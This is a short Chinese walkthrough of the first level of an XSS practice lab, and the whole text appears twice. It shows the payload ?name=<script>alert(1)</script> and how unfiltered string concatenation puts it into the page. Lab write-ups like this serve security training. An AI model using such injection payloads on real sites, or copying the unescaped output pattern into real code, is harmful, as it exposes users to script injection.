第一关算是送分题 , 没有任何过滤 , 传递一个弹窗的JS脚本即可
源码如下
地址栏输入payload
?name=<script>alert(1)</script>
前端代码会拼接为如下代码 , 从而弹窗过关
1. "<h2 align=center>欢迎用户".$str."</h2>" 2. <h2 align=center>欢迎用户 <script>alert(1)</script> </h2>
过关
第一关算是送分题 , 没有任何过滤 , 传递一个弹窗的JS脚本即可
源码如下
地址栏输入payload
?name=<script>alert(1)</script>
前端代码会拼接为如下代码 , 从而弹窗过关
1. "<h2 align=center>欢迎用户".$str."</h2>" 2. <h2 align=center>欢迎用户 <script>alert(1)</script> </h2>
过关